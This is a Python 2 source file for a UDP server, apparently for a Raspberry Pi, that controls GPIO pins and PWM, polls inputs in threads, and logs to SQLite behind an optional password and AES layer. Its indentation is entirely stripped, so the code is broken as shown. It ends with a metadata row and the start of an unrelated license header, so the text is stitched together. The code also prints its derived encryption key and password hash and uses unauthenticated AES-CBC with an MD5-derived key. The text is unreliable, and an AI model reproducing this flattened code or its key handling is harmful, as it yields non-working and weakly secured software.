def GPIOset(pinout,onoff):
pins = pinout.split(",")
onoff = stringToint(onoff)
if onoff < 2:
for pin in pins:
pin = stringToint(pin)
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(pin, GPIO.OUT)
GPIO.output(pin, onoff)
def GPIOstate(pin):
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(stringToint(pin), GPIO.OUT)
return GPIO.input(stringToint(pin))
def GPIOset_in(inpin):
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(inpin,GPIO.IN,GPIO.PUD_UP)
def GPIOPWM(inpin,fr):
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(inpin, GPIO.OUT)
p = GPIO.PWM(inpin, fr)
return p
pwm = {k: [] for k in range(2)}
def inputLoop2(outid,inid,inpin,Stan,reverse):
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
inpin = int(inpin)
id2 = int(inid)
Stan = int(Stan)
GPIO.setup(inpin,GPIO.IN,GPIO.PUD_UP)
if Stan == 1:
stan = 6
else:
stan = 1
while exitapp == False:
if stan ==1:
if GPIO.input(inpin)==0:
stan=2
cursor1 = conndb.execute("SELECT Stan, Reverse from stany where Id=?", (outid,))
for row in cursor1:
if int(row[0])==1:
stan=3
elif stan ==2:
cursor2 = conndb.execute("SELECT GPIO_BCM, Reverse from stany where Id=?", (outid,))
for row in cursor2:
GPIOset(str(row[0]),1)
gpiolist = row[0].split(",")
for gpio in gpiolist:
conndb.execute("UPDATE stany set Stan =2,Edit_time=? where (GPIO_BCM like ? and Id!=?) or (GPIO_BCM like ? and Id!=?);",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),"%"+gpio+",%",str(outid),"%,"+gpio+"%",str(outid)))
conndb.execute("UPDATE stany set Stan =?,Edit_time=? where GPIO_BCM =? and Id!=? ;",(str(1),datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),gpio,str(outid)))
conndb.execute("UPDATE stany set Stan =?,Edit_time=? where Id=?",(str(1),datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(outid)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",outid,"ON" if (not reverse) else "OFF"))
conndb.execute("UPDATE stany set Stan =1,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",inid,"ON" if (not reverse) else "OFF"))
conndb.commit()
stan = 5
if GPIO.input(inpin)==1:
conndb.execute("UPDATE stany set Stan =0,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",inid,"ON" if reverse else "OFF"))
conndb.commit()
stan=3
elif stan ==3:
if GPIO.input(inpin)==0:
stan=4
cursor1 = conndb.execute("SELECT Stan, Reverse from stany where Id=?", (outid,))
for row in cursor1:
if int(row[0])==0:
stan=1
elif stan ==4:
cursor2 = conndb.execute("SELECT GPIO_BCM, Reverse from stany where Id=?", (outid,))
for row in cursor2:
GPIOset(str(row[0]),0)
gpiolist = row[0].split(",")
for gpio in gpiolist:
conndb.execute("UPDATE stany set Stan =2,Edit_time=? where (GPIO_BCM like ? and Id!=?) or (GPIO_BCM like ? and Id!=?);",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),"%"+gpio+",%",str(outid),"%,"+gpio+"%",str(outid)))
conndb.execute("UPDATE stany set Stan =?,Edit_time=? where GPIO_BCM =? and Id!=? ;",(str(0),datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),gpio,str(outid)))
conndb.execute("UPDATE stany set Stan =?,Edit_time=? where Id=?",(str(0),datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(outid)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",outid,"ON" if reverse else "OFF"))
conndb.execute("UPDATE stany set Stan =1,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",inid,"ON" if (not reverse) else "OFF"))
conndb.commit()
stan = 6
if GPIO.input(inpin)==1:
conndb.execute("UPDATE stany set Stan =0,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",inid,"ON" if reverse else "OFF"))
conndb.commit()
stan=1
elif stan ==5:
if GPIO.input(inpin)==1:
conndb.execute("UPDATE stany set Stan =0,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",inid,"ON" if reverse else "OFF"))
conndb.commit()
stan=3
elif stan ==6:
if GPIO.input(inpin)==1:
conndb.execute("UPDATE stany set Stan =0,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",inid,"ON" if reverse else "OFF"))
conndb.commit()
stan=1
time.sleep(0.05)
if break_ == id2:
break
def inputLoop3(id,inpin,Stan,reverse,outid):
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
inpin = int(inpin)
id2 = int(id)
Stan = int(Stan)
GPIO.setup(inpin,GPIO.IN,GPIO.PUD_UP)
Oreverse = 0
if Stan == 0:
stan = 2
elif Stan == 1:
stan = 4
else:
stan = 2
while exitapp == False:
if stan ==2:
if GPIO.input(inpin)==0:
cursor2 = conndb.execute("SELECT GPIO_BCM, Reverse from stany where Id=?", (outid,))
for row in cursor2:
Oreverse=int(row[1])
GPIOset(str(row[0]),1 if not Oreverse else 0)
gpiolist = row[0].split(",")
for gpio in gpiolist:
conndb.execute("UPDATE stany set Stan =2,Edit_time=? where (GPIO_BCM like ? and Id!=?) or (GPIO_BCM like ? and Id!=?);",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),"%"+gpio+",%",str(outid),"%,"+gpio+"%",str(outid)))
conndb.execute("UPDATE stany set Stan =?,Edit_time=? where GPIO_BCM =? and Id!=? ;",(str(1 if not Oreverse else 0),datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),gpio,str(outid)))
conndb.execute("UPDATE stany set Stan =?,Edit_time=? where Id=?",(str(1 if not Oreverse else 0),datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(outid)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",outid,"ON" if (not reverse) else "OFF"))
conndb.execute("UPDATE stany set Stan =1,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",id,"ON" if (not reverse) else "OFF"))
conndb.commit()
stan=4
if stan ==4:
if GPIO.input(inpin)==1:
cursor2 = conndb.execute("SELECT GPIO_BCM, Reverse from stany where Id=?", (outid,))
for row in cursor2:
Oreverse=int(row[1])
GPIOset(str(row[0]),0 if not Oreverse else 1)
gpiolist = row[0].split(",")
for gpio in gpiolist:
conndb.execute("UPDATE stany set Stan =2,Edit_time=? where (GPIO_BCM like ? and Id!=?) or (GPIO_BCM like ? and Id!=?);",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),"%"+gpio+",%",str(outid),"%,"+gpio+"%",str(outid)))
conndb.execute("UPDATE stany set Stan =?,Edit_time=? where GPIO_BCM =? and Id!=? ;",(str(0 if not Oreverse else 1),datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),gpio,str(outid)))
conndb.execute("UPDATE stany set Stan =?,Edit_time=? where Id=?",(str(0 if not Oreverse else 1),datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(outid)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",outid,"ON" if reverse else "OFF"))
conndb.execute("UPDATE stany set Stan =0,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",id,"ON" if reverse else "OFF"))
conndb.commit()
stan=2
time.sleep(0.05)
if break_ == id2:
break
def inputLoop4(id,inpin,Stan,reverse):
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
inpin = int(inpin)
id2 = int(id)
Stan = int(Stan)
GPIO.setup(inpin,GPIO.IN,GPIO.PUD_UP)
if Stan == 0:
stan = 2
elif Stan == 1:
stan = 4
else:
stan = 2
while exitapp == False:
if stan ==2:
if GPIO.input(inpin)==0:
conndb.execute("UPDATE stany set Stan =1,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",id,"ON" if (not reverse) else "OFF"))
conndb.commit()
stan=4
if stan ==4:
if GPIO.input(inpin)==1:
conndb.execute("UPDATE stany set Stan =0,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",id,"ON" if reverse else "OFF"))
conndb.commit()
stan=2
time.sleep(0.05)
if break_ == id2:
break
if __name__ == '__main__':
print 'Server is starting...'
print 'Please press Ctrl+C to end the program...'
conndb = sqlite3.connect(db_path, check_same_thread=False)
conndb.isolation_level = None
tableexist = conndb.execute("SELECT * FROM sqlite_master WHERE name ='stany' and type='table';")
if len(tableexist.fetchall()) == 0:
print "Creating database..."
conndb.executescript('''CREATE TABLE IF NOT EXISTS `stany` (
`Id` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
`GPIO_BCM` TEXT NOT NULL,
`Stan` INTEGER NOT NULL,
`Name` TEXT,
`IN_OUT` TEXT,
`Edit_time` TEXT,
`Reverse` INTEGER NOT NULL,
`Bindid` INTEGER,
`Bindtype` INTEGER);
CREATE TABLE IF NOT EXISTS `planowanie` (
`Id` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
`Warunek` TEXT NOT NULL,
`Podwarunek` TEXT,
`Rodzaj` TEXT NOT NULL,
`Dane` TEXT,
`Out_id` INTEGER NOT NULL,
`Stan` INTEGER NOT NULL,
`Edit_time` TEXT );
CREATE TABLE IF NOT EXISTS `pwm` (
`Id` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
`GPIO_BCM` TEXT NOT NULL,
`FR` NUMERIC NOT NULL,
`DC` INTEGER NOT NULL,
`SS` INTEGER NOT NULL,
`Name` TEXT NOT NULL,
`Reverse` INTEGER NOT NULL,
`Edit_time` TEXT);
CREATE TABLE IF NOT EXISTS `historia` (
`Id` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
`Czas` TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
`Typ` TEXT,
`Id_IO` INTEGER,
`Id_Pwm` INTEGER,
`Stan` TEXT NOT NULL);''')
print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')
try :
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print 'Socket created'
except socket.error, msg :
print 'Failed to create socket. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
i = 0
for arg in sys.argv:
if arg == '-port':
try:
PORT = int(sys.argv[i+1])
except ValueError:
print "Wrong port argument"
elif arg == '-address':
HOST = sys.argv[i+1]
elif arg == '-password':
PASSWORD = hashlib.sha256(sys.argv[i+1].encode()).hexdigest()
ENC_KEY = hashlib.md5(sys.argv[i+1].encode()).hexdigest()
print ENC_KEY
import base64
from Crypto import Random
from Crypto.Cipher import AES
def encrypt(key, message):
try:
bs = 16
message = message + (bs - len(message) % bs) * chr(bs - len(message) % bs)
iv = Random.new().read(AES.block_size)
cipher = AES.new(key, AES.MODE_CBC, iv)
s = base64.b64encode(iv + cipher.encrypt(message)).decode('utf-8')
except:
s = "error"
return s
def decrypt(key, enc_message):
try:
enc_message = base64.b64decode(enc_message)
iv = enc_message[:AES.block_size]
cipher = AES.new(key, AES.MODE_CBC, iv)
s = cipher.decrypt(enc_message[AES.block_size:])
s = s[:-ord(s[len(s)-1:])].decode('utf-8')
except:
s = "error"
return s
i = i+1
try:
s.bind((HOST, PORT))
except socket.error , msg:
print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
print 'Socket bind complete ' + str(s.getsockname()) + PASSWORD
cursor1 = conndb.execute("SELECT * from stany where IN_OUT like 'out' order by Edit_time ASC")
for row in cursor1:
print 'OUTPUT: GPIO='+str(row[1])+' STATE='+str(row[2])
GPIOset(row[1],row[2]) if not row[8] else GPIOset(row[1],0 if not row[6] else 1)
cursor1 = conndb.execute("SELECT * from pwm")
for row in cursor1:
print 'OUTPUT PWM: GPIO='+str(row[1])+' S/S='+str(row[4])+' FR='+str(row[2])+' DC='+str(row[3])
pwmpins = row[1].split(",")
for pin in pwmpins:
pwm[pin] = GPIOPWM(int(pin),float(row[2]))
if row[4] == 1:
pwm[pin].start(int(row[3]))
try:
pid = planowanie()
cursor1 = conndb.execute("SELECT * from stany where IN_OUT like 'in'")
for row in cursor1:
print 'INPUT: GPIO='+str(row[1])+' STATE='+str(row[2])
if row[8] == 1:
threading.Thread(target=inputLoop2, args=(row[7],row[0],row[1],row[2],row[6])).start()
elif row[8] == 2:
threading.Thread(target=inputLoop3, args=(row[0],row[1],row[2],row[6],row[7])).start()
else:
threading.Thread(target=inputLoop4, args=(row[0],row[1],row[2],row[6])).start()
while 1:
d = s.recvfrom(1024)
data = d[0].strip()
addr = d[1]
datalist = data.split(";")
passwalidation = False
if PASSWORD == '':
passwalidation = True
else:
if datalist[0] == PASSWORD:
temp = decrypt(ENC_KEY,datalist[1])
if temp == 'error':
passwalidation = False
print 'Decrytion error'
else:
datalist = ("0;"+temp).split(";")
passwalidation = True
else:
passwalidation = False
if passwalidation == True:
if datalist[1] == 'version_check':
reply = 'true;version_check;'+str(CODE_VERSION)+';'
elif datalist[1] == 'GPIO_OEtime':
cursor8 = conndb.execute("SELECT Max(Edit_time) FROM stany where IN_OUT like 'out'")
for row in cursor8:
reply = 'true;GPIO_OEtime;'+str(row[0])+';'
elif datalist[1] == 'GPIO_Olist':
cursor9 = conndb.execute("SELECT * from stany where IN_OUT like 'out'")
reply = 'true;GPIO_Olist;'
for row in cursor9:
reply += str(row[0])+';'+str(row[1])+';'+str(row[2])+';'+str(row[3])+';'+str(row[6])+';'+str(row[8])+';'
elif datalist[1] == 'Add_GPIO_out':
idio = conndb.execute("INSERT INTO stany VALUES (null,?,2,?,'out',?,?,null,?)",(datalist[2],datalist[3],datalist[4],datalist[5],datalist[6])).lastrowid
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",(datalist[7],str(idio),"ADDED"))
conndb.commit()
reply= 'true;Add_GPIO_out;'
elif datalist[1] == 'Edit_GPIO_out':
conndb.execute("UPDATE stany set Stan=2, GPIO_BCM=?,Name=?, Edit_time=?, reverse=?, Bindtype=? where Id=?",(datalist[3],datalist[4],datalist[5],datalist[6],datalist[8],datalist[2]))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",(datalist[9],datalist[2],"EDITED"))
conndb.commit()
pwmpins = datalist[3].split(',')
pwmpins2 = datalist[7].split(',')
for pin2 in pwmpins2:
if pin2 not in pwmpins:
GPIO.cleanup(int(pin2))
reply= 'true;Edit_GPIO_out;'
elif datalist[1] == 'Delete_GPIO_out':
break_ = int(datalist[2])
conndb.execute("DELETE from stany where Id=?",(datalist[2],))
conndb.execute("UPDATE stany set Edit_time=? where Id in (SELECT Id FROM stany LIMIT 1)",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),))
conndb.execute("DELETE from historia where Id_IO=?",(datalist[2],))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",(datalist[5],datalist[2],datalist[4]+" DELETED"))
r1 = conndb.execute("DELETE from planowanie where Out_id=?",(datalist[2],)).rowcount
if r1 > 0:
conndb.execute("UPDATE planowanie set Edit_time=? where Id in (SELECT Id FROM planowanie LIMIT 1)",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),))
conndb.commit()
pwmpins = datalist[3].split(",")
for pin in pwmpins:
GPIO.cleanup(int(pin))
reply= 'true;Delete_GPIO_out;'
elif datalist[1] == 'GPIO_IEtime':
cursor8 = conndb.execute("SELECT Max(Edit_time) FROM stany where IN_OUT like 'in'")
for row in cursor8:
reply = 'true;GPIO_IEtime;'+str(row[0])+';'
elif datalist[1] == 'GPIO_Ilist':
cursor13 = conndb.execute("SELECT * from stany where IN_OUT like 'in'")
reply = 'true;GPIO_Ilist;'
for row in cursor13:
reply += str(row[0])+';'+str(row[1])+';'+str(row[2])+';'+str(row[3])+';'+str(row[6])+';'+str(row[7])+';'+str(row[8])+';'
elif datalist[1] == 'Add_GPIO_in':
id = conndb.execute("INSERT INTO stany VALUES (null,?,0,?,'in',?,?,?,?)",(datalist[2],datalist[3],datalist[4],datalist[5],datalist[6],datalist[7])).lastrowid
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",(datalist[8],str(id),"ADDED"))
conndb.commit()
if datalist[7] == '1':
threading.Thread(target=inputLoop2, args=(datalist[6],id,datalist[2],'0',datalist[5])).start()
elif datalist[7] == '2':
threading.Thread(target=inputLoop3, args=(id,datalist[2],'0',datalist[5],datalist[6])).start()
else:
threading.Thread(target=inputLoop4, args=(id,datalist[2],'0',datalist[5])).start()
reply= 'true;Add_GPIO_in;'
elif datalist[1] == 'Edit_GPIO_in':
break_ = int(datalist[2])
conndb.execute("DELETE from stany where Id=?",(datalist[2],))
conndb.execute("DELETE from historia where Id_IO=?",(datalist[2],))
id = conndb.execute("INSERT INTO stany VALUES (null,?,0,?,'in',?,?,?,?)",(datalist[3],datalist[4],datalist[5],datalist[6],datalist[7],datalist[8])).lastrowid
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",(datalist[10],str(id),"EDITED"))
conndb.commit()
if datalist[3] != datalist[9]:
GPIO.cleanup(int(datalist[9]))
if datalist[8] == '1':
threading.Thread(target=inputLoop2, args=(datalist[7],id,datalist[3],'0',datalist[6])).start()
elif datalist[8] == '2':
threading.Thread(target=inputLoop3, args=(id,datalist[3],'0',datalist[6],datalist[7])).start()
else:
threading.Thread(target=inputLoop4, args=(id,datalist[3],'0',datalist[6])).start()
reply= 'true;Edit_GPIO_in;'
elif datalist[1] == 'GPIO_Oname':
cursor12 = conndb.execute("SELECT Id,Name,GPIO_BCM,Reverse from stany where IN_OUT like 'out'")
reply = 'true;GPIO_Oname;'
for row in cursor12:
reply += str(row[0])+';'+str(row[1])+';'+str(row[2])+';'+str(row[3])+';'
elif datalist[1] == 'GPIO_PEtime':
cursor13 = conndb.execute("SELECT Max(Edit_time) FROM pwm")
for row in cursor13:
reply = 'true;GPIO_PEtime;'+str(row[0])+';'
elif datalist[1] == 'GPIO_Plist':
cursor14 = conndb.execute("SELECT * from pwm")
reply = 'true;GPIO_Plist;'
for row in cursor14:
reply += str(row[0])+';'+str(row[1])+';'+str(row[2])+';'+str(row[3])+';'+str(row[4])+';'+str(row[5])+';'+str(row[6])+';'
elif datalist[1] == 'GPIO_PDC':
pwmpins = datalist[3].split(",")
for pin in pwmpins:
pwm[pin].ChangeDutyCycle(int(datalist[4]))
reply = 'true;GPIO_PDC;'+datalist[4]+';'
elif datalist[1] == 'GPIO_PDCu':
conndb.execute("UPDATE pwm set DC=?,Edit_time=? where Id=?",(datalist[4],datalist[5],datalist[2]))
conndb.execute("INSERT INTO historia(Typ, Id_Pwm, Stan) VALUES(?,?,?)",(datalist[6],datalist[2],"DC="+datalist[4]+"%"))
conndb.commit()
reply = 'true;GPIO_PDCu;'+datalist[4]+';'+datalist[5]+';'
elif datalist[1] == 'GPIO_PFRDC':
pwmpins = datalist[3].split(",")
for pin in pwmpins:
pwm[pin].ChangeDutyCycle(int(datalist[5]))
pwm[pin].ChangeFrequency(float(datalist[4]))
conndb.execute("UPDATE pwm set FR=?,DC=?,Edit_time=? where Id=?",(datalist[4],datalist[5],datalist[6],datalist[2]))
conndb.execute("INSERT INTO historia(Typ, Id_Pwm, Stan) VALUES(?,?,?)",(datalist[7],datalist[2],"DC="+datalist[5]+"%,FR="+datalist[4]+"Hz"))
conndb.commit()
reply = 'true;GPIO_PFRDC;'+datalist[4]+';'+datalist[6]+';'+datalist[5]+';'
elif datalist[1] == 'GPIO_PSS':
pwmpins = datalist[3].split(",")
for pin in pwmpins:
if datalist[6] == '1':
pwm[pin].start(int(datalist[4]))
pwm[pin].ChangeFrequency(float(datalist[7]))
conndb.execute("INSERT INTO historia(Typ, Id_Pwm, Stan) VALUES(?,?,?)",(datalist[8],datalist[2],"ON:DC="+datalist[4]+"%,FR="+datalist[7]+"Hz"))
elif datalist[6] == '0':
pwm[pin].stop()
conndb.execute("INSERT INTO historia(Typ, Id_Pwm, Stan) VALUES(?,?,?)",(datalist[8],datalist[2],"OFF"))
conndb.execute("UPDATE pwm set DC=?,Edit_time=?,SS=? where Id=?",(datalist[4],datalist[5],datalist[6],datalist[2]))
conndb.commit()
reply = 'true;GPIO_PSS;'+datalist[4]+';'+datalist[5]+';'+datalist[6]+';'
elif datalist[1] == 'Add_GPIO_pwm':
pwmpins = datalist[2].split(',')
for pin in pwmpins:
pwm[pin] = GPIOPWM(int(pin),float(datalist[3]))
pwm[pin].start(int(datalist[4]))
idpwm = conndb.execute("INSERT INTO pwm VALUES (null,?,?,?,1,?,?,?)",(datalist[2],datalist[3],datalist[4],datalist[5],datalist[6],datalist[7])).lastrowid
conndb.execute("INSERT INTO historia(Typ, Id_Pwm, Stan) VALUES(?,?,?)",(datalist[8],str(idpwm),"ADDED:DC="+datalist[4]+"%,FR="+datalist[3]+"Hz"))
conndb.commit()
reply= 'true;Add_GPIO_pwm;'
elif datalist[1] == 'Delete_GPIO_pwm':
break_ = int(datalist[2])
conndb.execute("DELETE from pwm where Id=?",(datalist[2],))
conndb.execute("DELETE from historia where Id_Pwm=?",(datalist[2],))
conndb.execute("UPDATE pwm set Edit_time=? where Id in (SELECT Id FROM pwm LIMIT 1)",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),))
conndb.execute("INSERT INTO historia(Typ, Id_Pwm, Stan) VALUES(?,?,?)",(datalist[5],datalist[2],datalist[4]+" DELETED"))
conndb.commit()
pwmpins = datalist[3].split(',')
for pin in pwmpins:
pwm[pin].stop()
pwm.pop(pin)
GPIO.cleanup(int(pin))
reply= 'true;Delete_GPIO_pwm;'
elif datalist[1] == 'Edit_GPIO_pwm':
pwmpins = datalist[3].split(',')
pwmpins2 = datalist[4].split(',')
for pin in pwmpins:
if pin not in pwmpins2:
pwm[pin].stop()
pwm.pop(pin)
GPIO.cleanup(int(pin))
for pin2 in pwmpins2:
if pin2 not in pwmpins:
pwm[pin2] = GPIOPWM(int(pin2),float(datalist[5]))
pwm[pin2].start(int(datalist[6]))
else:
pwm[pin2].ChangeDutyCycle(int(datalist[6]))
pwm[pin2].ChangeFrequency(float(datalist[5]))
conndb.execute("UPDATE pwm set GPIO_BCM=?, FR=?, DC=?, SS=1, Name=?, Reverse=?, Edit_time=? where Id=?",(datalist[4],datalist[5],datalist[6],datalist[7],datalist[8],datalist[9],datalist[2]))
conndb.execute("INSERT INTO historia(Typ, Id_Pwm, Stan) VALUES(?,?,?)",(datalist[10],datalist[2],"EDITED:DC="+datalist[6]+"%,FR="+datalist[5]+"Hz"))
conndb.commit()
reply= 'true;Edit_GPIO_pwm;'
elif datalist[1] == 'Allpins_GPIO_pwm':
reply = 'true;Allpins_GPIO_pwm;'
cursor15 = conndb.execute("SELECT GPIO_BCM from pwm")
for row in cursor15:
pins = row[0].split(',')
for pin in pins:
reply+= pin+';'
elif datalist[1] == 'Allpins_GPIO_out':
reply = 'true;Allpins_GPIO_out;'
cursor16 = conndb.execute("SELECT GPIO_BCM from stany where IN_OUT like 'out'")
for row in cursor16:
pins = row[0].split(',')
for pin in pins:
reply+= pin+';'
elif datalist[1] == 'Allpins_GPIO_in':
reply = 'true;Allpins_GPIO_in;'
cursor17 = conndb.execute("SELECT GPIO_BCM from stany where IN_OUT like 'in'")
for row in cursor17:
reply+= str(row[0])+';'
elif datalist[1] == 'GPIO_SAEtime':
cursor18 = conndb.execute("SELECT Max(Edit_time) FROM planowanie")
for row in cursor18:
reply = 'true;GPIO_SAEtime;'+str(row[0])+';'
elif datalist[1] == 'GPIO_SAlist':
cursor19 = conndb.execute("SELECT * from planowanie p join stany s on p.Out_id = s.Id")
reply = 'true;GPIO_SAlist;'
for row in cursor19:
reply += str(row[0])+';'+str(row[1])+';'+str(row[2])+';'+str(row[3])+';'+str(row[4])+';'+str(row[6])+';'+str(row[11])+';'+str(row[14])+';'
elif datalist[1] == 'GPIO_set':
GPIOset(datalist[3],datalist[4])
reply = 'true;GPIO_set;'+datalist[4]+';'+datalist[5]+';'
gpiolist = datalist[3].split(",")
for gpio in gpiolist:
r1 = conndb.execute("UPDATE stany set Stan =2,Edit_time=? where (GPIO_BCM like ? and Id!=? and IN_OUT like 'out') or (GPIO_BCM like ? and Id!=? and IN_OUT like 'out');",(datalist[5],"%"+gpio+",%",datalist[2],"%,"+gpio+"%",datalist[2])).rowcount
r2 = conndb.execute("UPDATE stany set Stan =?,Edit_time=? where GPIO_BCM =? and Id!=? and IN_OUT like 'out' ;",(datalist[4],datalist[5],gpio,datalist[2])).rowcount
conndb.execute("UPDATE stany set Stan =?,Edit_time=? where Id=?",(datalist[4],datalist[5],datalist[2]))
stan = int(datalist[4])
reverse = int(datalist[6])
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",(datalist[7],datalist[2],"ON" if ((stan and not reverse) or (not stan and reverse)) else "OFF"))
if r1 > 0 or r2 > 0:
reply = 'true;GPIO_set;'+datalist[4]+';2000-01-01 00:00:00.000;'
conndb.commit()
elif datalist[1] == 'GPIO_state':
reply = 'true;GPIO_state;'+str(datalist[2])+';'+str(GPIOstate(datalist[2]))+';'
elif datalist[1] == 'Insert_Action':
conndb.execute("INSERT INTO planowanie(Warunek, Podwarunek, Rodzaj, Dane, Out_id, Stan, Edit_time) VALUES(?,?,?,?,?,?,?)",(datalist[2],datalist[3],datalist[4],datalist[5],datalist[6],datalist[7],datalist[8]))
conndb.commit()
reply= 'true;Insert_Action;'
elif datalist[1] == 'Update_Action':
conndb.execute("UPDATE planowanie set Warunek=?, Podwarunek=?, Rodzaj=?, Dane=?, Out_id=?, Stan=?, Edit_time=? where Id=?",(datalist[2],datalist[3],datalist[4],datalist[5],datalist[6],datalist[7],datalist[9],datalist[8]))
conndb.commit()
reply= 'true;Update_Action;'
elif datalist[1] == 'Delete_Action':
conndb.execute("DELETE from planowanie where Id=?",(datalist[2],))
conndb.execute("UPDATE planowanie set Edit_time=? where Id in (SELECT Id FROM planowanie LIMIT 1)",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),))
conndb.commit()
reply= 'true;Delete_Action;'
elif datalist[1] == 'HR_count':
cursor6 = conndb.execute("SELECT COUNT(*) FROM historia where Czas between ? and ?",(datalist[2],datalist[3]))
for row in cursor6:
reply = 'true;HR_count;'+str(row[0])+';'
elif datalist[1] == 'HR_sel':
cursor5 = conndb.execute("SELECT h.Id,Czas,Typ,case when s.Name is NULL then p.Name else s.Name end as 'Name',h.Stan FROM historia h Left JOIN stany s ON s.Id = h.Id_IO left JOIN pwm p ON p.Id = h.Id_Pwm where Czas between ? and ? order by Czas DESC",(datalist[2],datalist[3]))
reply = 'true;HR_sel;'+datalist[4]+";"
for row in cursor5:
reply += str(row[0])+';'+str(row[1])+';'+str(row[2])+';'+str(row[3])+';'+str(row[4])+';'
else:
reply = 'false;Conection OK, but no compabile method found, probably encryption error;'
else:
reply = 'false;Wrong password !;'
if PASSWORD != '' and passwalidation == True :
reply = '1;'+encrypt(ENC_KEY,reply)+';'
s.sendto(reply , addr)
print 'Message[' + addr[0] + ':' + str(addr[1]) + '] - ' + data
print reply
except KeyboardInterrupt:
print "...Ending..."
exitapp = True
s.close()
conndb.close()
GPIO.cleanup()
sys.exit()
| mit | 7,529,238,602,961,676,000 | 57.794721 | 297 | 0.504314 | false |
kishikawakatsumi/Mozc-for-iOS | src/chrome/nacl/nacl_net_test_server.py | 1 | 10698 | # -*- coding: utf-8 -*-
# Copyright 2010-2014, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
